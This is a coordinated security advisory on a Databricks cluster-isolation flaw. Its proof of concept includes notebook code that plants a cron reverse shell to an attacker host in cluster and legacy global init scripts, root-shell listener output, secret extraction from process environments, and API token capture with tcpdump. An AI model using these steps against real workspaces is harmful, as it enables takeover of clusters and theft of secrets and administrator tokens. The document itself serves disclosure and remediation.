Bypassing cluster isolation in Databricks Platform

Title

Bypassing cluster isolation through insecure defaults and shared storage

Product

Databricks Platform

Vulnerable Version

PaaS version as of 2023-01-26

Fixed Version

Current PaaS version

CVE Number

-

Impact

critical

Found

2023-01-20

By

Florian Roth (Atos), Marius Bartholdy (SEC Office Berlin) | SEC Consult Vulnerability Lab

A low-privileged user is able to break the isolation between Databricks compute clusters and take over any cluster in a workspace, as long as they are able to run notebooks. Due to an insecure default configuration combined with insufficient access control, it is possible to gain remote code execution on all clusters of a workspace. With such access, an attacker can leak secrets and escalate privileges to those of a workspace administrator.

Vendor description

"Databricks Data Science & Engineering (sometimes called simply "Workspace") is an analytics platform based on Apache Spark. It is integrated with Azure to provide one-click setup, streamlined workflows, and an interactive workspace that enables collaboration between data engineers, data scientists, and machine learning engineers."

Source: https://learn.microsoft.com/en-us/azure/databricks/scenarios/what-is-azure-databricks-ws

Business recommendation

The vendor disabled legacy scripts and migrated cluster-scoped scripts from DBFS to WSFS. Affected customers received migration instructions.

SEC Consult strongly recommends that security professionals perform a thorough security review of the product to identify and resolve potential further security issues.

A blog post has also been published, written in collaboration between Elia Florio, Sr. Director of Detection & Response at Databricks, and Florian Roth and Marius Bartholdy, security researchers with SEC Consult. It can be found here:
https://r.sec-consult.com/databr

Furthermore, a proof of concept demo video has been published here (Youtube):
https://r.sec-consult.com/dbyoutube

 

Databricks concepts

Concept 1: Databricks File System (DBFS)

"The Databricks File System (DBFS) is a distributed file system mounted into a Databricks workspace and available on Databricks clusters. DBFS is an abstraction on top of scalable object storage that maps Unix-like filesystem calls to native cloud storage API calls."

Source: https://docs.databricks.com/dbfs/index.html

Developers can therefore handle files as if they were local to a compute cluster, although the files actually reside in cloud storage.

The recommended way to interact with the DBFS is from within a notebook by using the Databricks Utilities (dbutils). The following command could be used to list the content of a directory:

display(dbutils.fs.ls("dbfs:/databricks/scripts"))

For further information see: https://learn.microsoft.com/en-us/azure/databricks/dbfs/
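To illustrate the "local file" abstraction described above, here is a minimal sketch that translates a dbfs:/ URI into the path under which the same object would appear on a cluster node. It assumes the /dbfs FUSE mount point documented by Databricks, which the advisory itself does not mention; the helper name dbfs_uri_to_fuse_path is hypothetical.

```python
def dbfs_uri_to_fuse_path(uri: str) -> str:
    """Translate a dbfs:/ URI into a local path under the /dbfs mount.

    Assumption: the cluster exposes DBFS through a FUSE mount at /dbfs.
    """
    prefix = "dbfs:/"
    if not uri.startswith(prefix):
        raise ValueError(f"not a DBFS URI: {uri!r}")
    # Drop the scheme and any extra leading slashes, then re-root under /dbfs.
    return "/dbfs/" + uri[len(prefix):].lstrip("/")


print(dbfs_uri_to_fuse_path("dbfs:/databricks/scripts"))
```

Both forms refer to the same shared storage, which is why a file written through dbutils by one user is visible to shell scripts running on any cluster.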


Concept 2: Init Scripts

Databricks provides a feature called "init scripts" to customize compute clusters. Init scripts are shell scripts that run during the startup of each cluster. They can be used to install dependencies or to configure advanced network settings.

There are different types of init scripts:

(I) Cluster-scoped init scripts only run on the specified cluster and have to be set up by the cluster owner. Before a cluster-scoped script can be used, it has to be uploaded to the DBFS. In the cluster configuration it is then referenced by its file path, e.g. dbfs:/databricks/scripts/init-health-check.sh

(II) Global init scripts run on every cluster and have to be configured by an administrative user. Their storage location is not disclosed.

(III) Legacy global init scripts are nominally deprecated. However, they are enabled by default, even on newly created workspaces. The main difference from the newer global init scripts is that they are stored on the DBFS in a fixed location at dbfs:/databricks/init.

For further information see: https://learn.microsoft.com/en-us/azure/databricks/clusters/init-scripts
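The three init script types above can be summarized in a small data structure. This is only a sketch of the properties stated in this advisory; the class and field names are hypothetical and do not correspond to any Databricks API.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class InitScriptType:
    name: str
    scope: str                      # which clusters run the script
    on_dbfs: bool                   # stored on the shared DBFS?
    fixed_location: Optional[str]   # well-known path, if any


INIT_SCRIPT_TYPES = [
    # Path is chosen by the cluster owner, but the file lives on DBFS.
    InitScriptType("cluster-scoped", "single cluster", True, None),
    # Storage location is not disclosed.
    InitScriptType("global", "every cluster", False, None),
    # Enabled by default and read from a fixed DBFS directory.
    InitScriptType("legacy global", "every cluster", True, "dbfs:/databricks/init"),
]

# Types whose scripts reside on storage shared by all workspace users.
exposed = [t.name for t in INIT_SCRIPT_TYPES if t.on_dbfs]
print(exposed)
```

The two types stored on DBFS are exactly the ones abused in the proof of concept below.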

 

Vulnerability overview/description

1) Bypassing cluster isolation through insecure defaults and shared storage

A low-privileged user is able to break the isolation between Databricks compute clusters and take over any cluster in a workspace, as long as they are allowed to run notebooks. Due to an insecure default configuration combined with insufficient access control, it is possible to gain remote code execution on all clusters of a workspace. With such access, an attacker can leak secrets and escalate privileges to those of a workspace administrator.


Attack scenario:
The DBFS is accessible by every user in a Databricks workspace. All files stored here are visible to anyone in the workspace. Cluster-scoped and legacy global init scripts are stored here. An authenticated attacker with the lowest possible permissions in a Databricks workspace could run a notebook to:

  1. Find and modify an existing cluster-scoped init script.
  2. Place a new script in the default location for legacy global init scripts.

Both attacks lead to the takeover of the compute cluster resources and enable further attacks: any stored secrets can be read, and workspace administrator tokens can be stolen, as demonstrated by Joosua Santasalo from Secureworks.

See: https://www.databricks.com/blog/2022/10/10/admin-isolation-shared-clusters.html
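From a defender's perspective, the scenario above suggests a simple audit: list the files on DBFS and flag every shell script, with scripts in the legacy global location treated as the most urgent. The sketch below works on a plain list of path strings (for example collected in a notebook from the path attribute of dbutils.fs.ls results); the function name and the returned keys are hypothetical.

```python
LEGACY_GLOBAL_DIR = "dbfs:/databricks/init/"


def flag_init_script_candidates(paths):
    """Split .sh files into legacy global scripts and other candidates.

    Assumption: any .sh file on DBFS may be referenced as an init script,
    since cluster configurations are not visible to the auditor here.
    """
    legacy, other = [], []
    for path in paths:
        if not path.endswith(".sh"):
            continue
        if path.startswith(LEGACY_GLOBAL_DIR):
            legacy.append(path)
        else:
            other.append(path)
    return {"legacy_global": legacy, "other_shell_scripts": other}


listing = [
    "dbfs:/databricks/scripts/init-health-check.sh",
    "dbfs:/databricks/init/global-init.sh",
    "dbfs:/databricks/scripts/readme.txt",
]
print(flag_init_script_candidates(listing))
```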

Proof of concept

1) Bypassing cluster isolation through insecure defaults and shared storage

a) Preparations

For this POC a new Azure Databricks workspace was created with the "premium" pricing tier. It includes an administrative user (databricks-workspace-admin) as well as a newly added low-privileged user (databricks-user) with the default permissions "Workspace access" and "Databricks SQL access". These are the fewest possible permissions a user can have.

To demonstrate both attack scenarios, three clusters were created:

  1. Cluster on which the databricks-user has permissions to run notebooks ("Can attach to")
  2. Cluster for the databricks-workspace-admin with a cluster-scoped init script already configured.
  3. Cluster for the databricks-workspace-admin with no init script

The databricks-user does not have access to clusters 2 and 3 and cannot even see them in the portal.

For cluster 2 (with a pre-configured init script) the following notebook code was used by the databricks-workspace-admin to create an init script which simply writes example output to /tmp/init-health-check-success.txt:

dbutils.fs.mkdirs("dbfs:/databricks/scripts/")
# The shebang must be the first line of the script, so it directly follows the opening quotes.
dbutils.fs.put("dbfs:/databricks/scripts/init-health-check.sh", """#!/bin/bash
echo 'Init health check: successful' > /tmp/init-health-check-success.txt
""", True)
display(dbutils.fs.ls("dbfs:/databricks/scripts/init-health-check.sh"))

After that the script was applied to cluster 2 as a cluster-scoped init script.

To show the impact of this attack in a more tangible way, a keyvault-backed secret scope as well as a databricks-backed secret scope were also created. Their secrets were then used in the Spark configuration and in the environment variables of clusters 2 and 3.

Spark configuration:
databricks-backed-secret {{secrets/databricks-backed-secret-scope/databricks-backed-secret}}
azure-keyvault-backed-secret {{secrets/key-vault-backed-secret-scope/azure-keyvault-backed-secret}} 

Environment variables:
databricks_backed_secret_in_environment={{secrets/databricks-backed-secret-scope/databricks-backed-secret-in-environment}}
azure_keyvault_backed_secret_in_environment={{secrets/key-vault-backed-secret-scope/azure-keyvault-backed-secret-in-environment}}

These serve only as examples. On a real production compute cluster they could be used to connect to additional cloud storage as described here:
https://learn.microsoft.com/en-us/azure/databricks/external-data/azure-storage#--access-azure-data-lake-storage-gen2-or-blob-storage-using-oauth-20-with-an-azure-service-principal
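The secret references used above follow the pattern {{secrets/<scope>/<key>}}. As a minimal sketch, the following helper extracts scope and key from such a reference, which can be useful when reviewing which secrets a cluster configuration exposes. The function name is hypothetical and the pattern is inferred only from the examples in this advisory.

```python
import re

# Pattern inferred from the configuration examples: {{secrets/<scope>/<key>}}
SECRET_REF = re.compile(r"\{\{secrets/([^/{}]+)/([^/{}]+)\}\}")


def parse_secret_reference(value: str):
    """Return (scope, key) for a secret reference, or None if it is not one."""
    match = SECRET_REF.fullmatch(value.strip())
    if match is None:
        return None
    return match.group(1), match.group(2)


spark_conf_value = "{{secrets/databricks-backed-secret-scope/databricks-backed-secret}}"
print(parse_secret_reference(spark_conf_value))

# Environment variables use NAME=<reference>; split off the name first.
env_line = ("azure_keyvault_backed_secret_in_environment="
            "{{secrets/key-vault-backed-secret-scope/azure-keyvault-backed-secret-in-environment}}")
name, _, reference = env_line.partition("=")
print(name, parse_secret_reference(reference))
```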

b) Attack via pre-existing init script

The attacker starts by viewing the content of the DBFS with the following code:

display(dbutils.fs.ls("dbfs:/databricks"))
display(dbutils.fs.ls("dbfs:/databricks/scripts"))

Any .sh file found could be a cluster-scoped init script applied to a cluster that the attacker is not aware of. Existing scripts cannot be overwritten, but they can be renamed or deleted. Because the cluster configuration references a script only by its path, a newly created script with the same name will be executed in its place. Such a malicious file was created; it includes a reverse shell that continually attempts to connect to the attacker's server.

# rename file
dbutils.fs.mv("/databricks/scripts/init-health-check.sh",
"/databricks/scripts/init-health-check.sh.old")
#write new file with malicious content
dbutils.fs.put("/databricks/scripts/init-health-check.sh","""
#!/bin/bash
crontab -l > mycron
echo "* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/$ATTACKER/8091 0>&1'" >> mycron
crontab mycron
rm mycron
""", True)

As soon as the init script is triggered again, for example via a cluster restart, a reverse shell connection, with root privileges on the compute cluster, is received:

user@$ATTACKER:~$ nc -lnkvp 8091
Listening on [0.0.0.0] (family 0, port 8091)
Connection from $TARGET 48518 received!
bash: cannot set terminal process group (21384): Inappropriate ioctl for device
bash: no job control in this shell
root@0121-110521-h6l5h1n2-10-139-64-5:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@0121-110521-h6l5h1n2-10-139-64-5:~# uname -a
uname -a
Linux 0121-110521-h6l5h1n2-10-139-64-5 5.4.0-1090-azure #95~18.04.1-Ubuntu SMP Sun Aug 14 20:09:27 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
root@0121-110521-h6l5h1n2-10-139-64-5:~#
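Since the cluster configuration in attack b) trusts whatever file currently sits at the configured path, one way a defender might detect the rename-and-replace step is to pin a content hash for each known init script and compare it regularly. The following is only a sketch of that idea operating on in-memory strings; how script contents are read and where pinned hashes are stored are left open, and all names are hypothetical.

```python
import hashlib


def sha256_hex(content: str) -> str:
    """Hex SHA-256 digest of a script's text content."""
    return hashlib.sha256(content.encode("utf-8")).hexdigest()


def find_tampered(pinned: dict, current: dict) -> list:
    """Return paths whose content is missing or differs from the pinned hash.

    pinned:  path -> expected SHA-256 hex digest
    current: path -> script content as currently stored
    """
    tampered = []
    for path, expected in pinned.items():
        content = current.get(path)
        if content is None or sha256_hex(content) != expected:
            tampered.append(path)
    return sorted(tampered)


good = "#!/bin/bash\necho 'Init health check: successful' > /tmp/init-health-check-success.txt\n"
path = "dbfs:/databricks/scripts/init-health-check.sh"
pinned = {path: sha256_hex(good)}

print(find_tampered(pinned, {path: good}))                           # unchanged script
print(find_tampered(pinned, {path: "#!/bin/bash\n# replaced\n"}))    # replaced script
```

A check like this only detects the change; it does not prevent the replaced script from running on the next cluster start.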

c) Attack via legacy global init script

Legacy global init scripts are enabled by default, so an attacker can assume the feature is turned on and place a script in the default location at dbfs:/databricks/init.

dbutils.fs.mkdirs("dbfs:/databricks/init/")
dbutils.fs.put("dbfs:/databricks/init/global-init.sh","""
#!/bin/bash
crontab -l > mycron
echo "* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/$ATTACKER/8091 0>&1'" >> mycron
crontab mycron
rm mycron
""", True)

Legacy global init scripts apply to every existing compute cluster, so every cluster will establish a reverse shell as soon as its init scripts are triggered again. This makes it possible to attack compute clusters even if they do not have a cluster-scoped init script set up.

user@$ATTACKER:~$ nc -lnkvp 8091
Listening on [0.0.0.0] (family 0, port 8091)
Connection from $TARGET 53910 received!
bash: cannot set terminal process group (988): Inappropriate ioctl for device
bash: no job control in this shell
root@0121-111747-cmijb28n-10-139-64-4:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@0121-111747-cmijb28n-10-139-64-4:~# uname -a
uname -a
Linux 0121-111747-cmijb28n-10-139-64-4 5.4.0-1100-azure #106~18.04.1-Ubuntu SMP Mon Dec 12 21:49:35 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
root@0121-111747-cmijb28n-10-139-64-4:~#

Impact

a) Leaking sensitive information in environment variables and the configuration

Secrets configured in the keyvault-backed secret scope can only be retrieved at runtime by the compute instance itself via a managed identity. Even Databricks workspace administrators cannot read them directly. They are, however, available to the compute cluster as soon as it is initialized. With remote code execution and root privileges, an attacker is able to read the plaintext secrets of any cluster.

Spark configuration secrets can be found at /tmp/custom-spark.conf:

root@0121-111747-cmijb28n-10-139-64-4:/tmp# cat custom-spark.conf
cat custom-spark.conf
spark.databricks.unityCatalog.enforce.permissions false
spark.driver.host 10.139.64.6
spark.databricks.secret.envVar.keys.toRedact ZGF0YWJyaWNrc19iYWNrZWRfc2VjcmV0X2luX2Vudmlyb25tZW50,YXp1cmVfa2V5dmF1bHRfYmFja2VkX3NlY3JldF9pbl9lbnZpcm9ubWVudA==
spark.driver.tempDirectory /local_disk0/tmp
spark.databricks.delta.preview.enabled true
spark.databricks.wsfsPublicPreview true
databricks-backed-secret databricks-backed-secret-value <- THIS IS A SECRET
spark.databricks.secret.sparkConf.keys.toRedact ZGF0YWJyaWNrcy1iYWNrZWQtc2VjcmV0,YXp1cmUta2V5dmF1bHQtYmFja2VkLXNlY3JldA==
spark.databricks.mlflow.autologging.enabled true
spark.executor.tempDirectory /local_disk0/tmp
spark.databricks.enablePublicDbfsFuse false
spark.databricks.workspaceUrl adb-8690126810713062.2.azuredatabricks.net
spark.master local[*, 4]
azure-keyvault-backed-secret azure-keyvault-backed-secret-value <- THIS IS A SECRET
spark.databricks.cloudfetch.hasRegionSupport true
spark.databricks.unityCatalog.enabled true
spark.databricks.automl.serviceEnabled true
spark.databricks.cluster.profile singleNode
root@0121-111747-cmijb28n-10-139-64-4:/tmp#
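The two toRedact entries in the output above are comma-separated, Base64-encoded lists. Decoding them, as in the short sketch below, shows that they contain only the names of the keys to redact, while the secret values themselves sit in the same file in plaintext. The helper name is hypothetical; the encoded strings are copied from the output above.

```python
import base64


def decode_redact_list(value: str) -> list:
    """Decode a comma-separated list of Base64-encoded key names."""
    return [base64.b64decode(item).decode("utf-8") for item in value.split(",")]


spark_conf_keys = "ZGF0YWJyaWNrcy1iYWNrZWQtc2VjcmV0,YXp1cmUta2V5dmF1bHQtYmFja2VkLXNlY3JldA=="
env_var_keys = ("ZGF0YWJyaWNrc19iYWNrZWRfc2VjcmV0X2luX2Vudmlyb25tZW50,"
                "YXp1cmVfa2V5dmF1bHRfYmFja2VkX3NlY3JldF9pbl9lbnZpcm9ubWVudA==")

print(decode_redact_list(spark_conf_keys))
print(decode_redact_list(env_var_keys))
```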

To read secrets in the environment variables, an attacker needs to access the environment of the right process. With root privileges, they are able to access the environment of every process by reading the corresponding /proc/<process-id>/environ file. For simplicity, however, the right process ID (888) was used directly in this POC:

root@0121-110521-h6l5h1n2-10-139-64-5:~# cat /proc/888/environ
SHELL=/bin/bash[...]
TERM=xterm-256color
USER=root
SPARK_PUBLIC_DNS=10.139.64.6
azure_keyvault_backed_secret_in_environment=
azure-keyvault-backed-secret-in-envionment-value <- THIS IS A SECRET
SPARK_LOCAL_DIRS=/local_disk0SHLVL=1
MASTER=local[4]
SPARK_HOME=/databricks/spark
SPARK_LOCAL_IP=10.139.64.6
MLFLOW_CONDA_HOME=/databricks/conda
CLASSPATH=/databricks/spark/dbconf/jets3t/:/databricks/spark/dbconf/log4j/driver:/databricks/hive/conf:/databricks/spark/dbconf/hadoop:/databricks/jars/*
SPARK_CONF_DIR=/databricks/spark/conf
SPARK_DIST_CLASSPATH=/databricks/spark/dbconf/log4j/driver:/databricks/jars/*
PYENV_ROOT=/databricks/.pyenv
DATABRICKS_LIBS_NFS_ROOT_PATH=/local_disk0/.ephemeral_nfs
SPARK_ENV_LOADED=1
DATABRICKS_CLUSTER_LIBS_ROOT_DIR=cluster_libraries
PATH=/databricks/.pyenv/bin:/usr/local/nvidia/bin:/databricks/python3/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
DATABRICKS_LIBS_NFS_ROOT_DIR=.ephemeral_nfsSUDO_UID=0
DATABRICKS_CLUSTER_LIBS_PYTHON_ROOT_DIR=python
SPARK_SCALA_VERSION=2.12
MAIL=/var/mail/root
databricks_backed_secret_in_environment=
database-backed-secret-in-environment-value <- THIS IS A SECRET
SCALA_VERSION=2.10PTY_LIB_FOLDER=/usr/lib/libptyOLDPWD=/databricks/chauffeurSPARK_WORKE
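Entries in /proc/<process-id>/environ are separated by NUL bytes rather than newlines, which likely explains why some entries in the output above appear fused together (for example SPARK_LOCAL_DIRS=/local_disk0SHLVL=1). The following sketch shows how such a buffer can be split into name/value pairs; the sample bytes are made up from names visible in the output and contain no secrets.

```python
def parse_environ(raw: bytes) -> dict:
    """Parse the NUL-separated content of a /proc/<pid>/environ file."""
    env = {}
    for entry in raw.split(b"\0"):
        if not entry:
            continue  # skip the empty chunk after the trailing NUL
        key, sep, value = entry.partition(b"=")
        if sep:
            env[key.decode("utf-8", "replace")] = value.decode("utf-8", "replace")
    return env


# Hypothetical sample; a real buffer would come from reading the file in binary mode.
sample = b"SPARK_LOCAL_DIRS=/local_disk0\0SHLVL=1\0MASTER=local[4]\0"
for name, value in parse_environ(sample).items():
    print(f"{name}={value}")
```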

b) API Token leak and privilege escalation

Using a vulnerability initially found by Joosua Santasalo from Secureworks, it is possible to leak Databricks API tokens of other users, including administrators. The previously proposed hardening technique "Use cluster types that support user isolation wherever possible." does not mitigate the initial vulnerability, as all compute cluster types are affected by our new vulnerability.
Source: https://www.databricks.com/blog/2022/10/10/admin-isolation-shared-clusters.html

It is thereby possible to impersonate any user and to gain privileges of a workspace administrator.

Using the previously established reverse shell, it is possible to capture control-plane traffic with the following command. As soon as a task is started by the administrative user, for example by running a simple notebook, the token is sent unencrypted and can be captured.

(Make sure to verify that you are on the correct cluster when reproducing the issue using the global init script attack vector since the user cluster will also be attacked and send a shell too. This confused us more often than we would like to admit.)

root@0121-110521-h6l5h1n2-10-139-64-5:~# /usr/sbin/tcpdump -i any -Aq | grep -i 'apiToken'
/usr/sbin/tcpdump -i any -Aq | grep -i 'apiToken'
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on any, link-type LINUX_SLL (Linux cooked v1), capture size 262144 bytes
{"apiToken":"dkea****************************a107","procStartTime":53444,"commandOrigin":"PythonDriver","commandId":"7712608268853321788_7012126414451989966_5680a35d486f42ac922d461b93b8b7bf","notebookDir":"/Users/databricks-workspace-admin@redacted.onmicrosoft.com"}
apiToken
{"apiToken":"dkea****************************a107","procStartTime":85732,"commandOrigin":"PythonWorker","commandId":"7712608268853321788_7012126414451989966_5680a35d486f42ac922d461b93b8b7bf","notebookDir":"/Users/databricks-workspace-
. . .

This apiToken could then be used in the Databricks CLI or with the REST API directly. The following example request needed administrative privileges to succeed:

└─$ curl -s  adb-redacted.2.azuredatabricks.net/api/2.0/secrets/scopes/list -H 'Authorization: Bearer dkea****************************a107' | jq
{
  "scopes": [
    {
      "name": "databricks-backed-secret-scope",
      "backend_type": "DATABRICKS"
    },
    {
      "name": "key-vault-backed-secret-scope",
      "backend_type": "AZURE_KEYVAULT",
      "keyvault_metadata": {
        "resource_id": "/subscriptions/714984c7-3ed0-4de2-b23b-9cffd28b74f7/resourceGroups/rg-databricks-proof-of-concept/providers/Microsoft.KeyVault/vaults/redacted-databricks-poc",
        "dns_name": "https://redacted-databricks-poc.vault.azure.net/"
      }
    }
  ]
}

Additional scenarios are possible once RCE is achieved, for example by using the managed identity of the compute clusters to get an access token via the instance metadata service at http://169.254.169.254/metadata/identity/oauth2/token.

Vulnerable / tested versions

The latest Databricks PaaS offering was tested on Azure as well as Amazon Web Services (AWS) with the "Premium" pricing tier as of 2023-01-26.

Vendor contact timeline

2023-01-26 Contacting vendor PGP-encrypted through security@databricks.com
2023-01-26 Vendor acknowledged the email and is reviewing the reports
2023-02-15 Vendor confirms all vulnerabilities and is working on a solution
2023-03-29 Vendor proposes a solution
2023-05-02 Coordinated release of security advisory

Solution

Databricks disabled the creation of new workspaces using the deprecated init script types and added support for init scripts stored in workspace files.

The following solution for end users has been provided by the vendor:

Legacy global init scripts:

  • Immediately disable legacy global init scripts (AWS [1] | Azure [2]) if not actively used: it's a safe, easy, and immediate step to close this potential attack vector.
  • Customers with legacy global init scripts deployed should first migrate legacy scripts to the new global init script type (this notebook [3] can be used to automate the migration work) and, after this migration step, proceed to disable the legacy version as indicated in the previous step.

[1] https://docs.databricks.com/clusters/init-scripts.html#migrate-legacy-scripts
[2] https://learn.microsoft.com/en-us/azure/databricks/clusters/init-scripts#migrate-legacy-scripts
[3] https://kb.databricks.com/legacy-global-init-script-migration-notebook


Cluster-named init scripts:

  • Cluster-named init scripts are similarly affected by the issue and are also deprecated: customers still using this type of init scripts should disable cluster-named init scripts (AWS | Azure), migrate them to cluster-scoped scripts, and make sure that the scripts are stored in the new workspace files storage location (AWS [4] | Azure [5] | GCP [6]). This notebook [7] can be used to automate the migration work.


Cluster-scoped init scripts:

  • Existing cluster-scoped init scripts stored on DBFS should be migrated to the alternative, safer workspace files location (AWS [4] | Azure [5] | GCP [6]). Going forward the default location of cluster-scoped init scripts in the product UI will be workspace files.

[4] https://docs.databricks.com/files/workspace.html
[5] https://learn.microsoft.com/en-us/azure/databricks/files/workspace
[6] https://docs.gcp.databricks.com/files/workspace.html
[7] https://kb.databricks.com/cluster-named-init-script-migration-notebook
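To find clusters that still need the migration described above, an administrator could inspect each cluster's configuration for init scripts that point at DBFS. The sketch below assumes the configuration is available as a dictionary with an init_scripts list whose entries are keyed by storage type (such as "dbfs" or "workspace") and carry a "destination" field; this shape is an assumption and should be checked against the current Clusters API documentation. The function name and sample data are hypothetical.

```python
def dbfs_init_scripts(cluster_config: dict) -> list:
    """Return destinations of init scripts that are still stored on DBFS.

    Assumed entry shape: {"dbfs": {"destination": "dbfs:/..."}} or
    {"workspace": {"destination": "/Users/..."}}.
    """
    found = []
    for entry in cluster_config.get("init_scripts", []):
        dbfs = entry.get("dbfs")
        if dbfs and "destination" in dbfs:
            found.append(dbfs["destination"])
    return found


# Hypothetical cluster configuration for illustration only.
cluster = {
    "cluster_name": "example-cluster",
    "init_scripts": [
        {"dbfs": {"destination": "dbfs:/databricks/scripts/init-health-check.sh"}},
        {"workspace": {"destination": "/Users/admin@example.com/init.sh"}},
    ],
}
print(dbfs_init_scripts(cluster))
```

Any destination reported by such a check is a candidate for migration to workspace files.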


Legacy global init scripts and cluster-named init scripts will be disabled for all workspaces on Sept 1, 2023. They will not function after this date.

Advisory URL

https://sec-consult.com/vulnerability-lab/

EOF Florian Roth, Marius Bartholdy / @2023

 
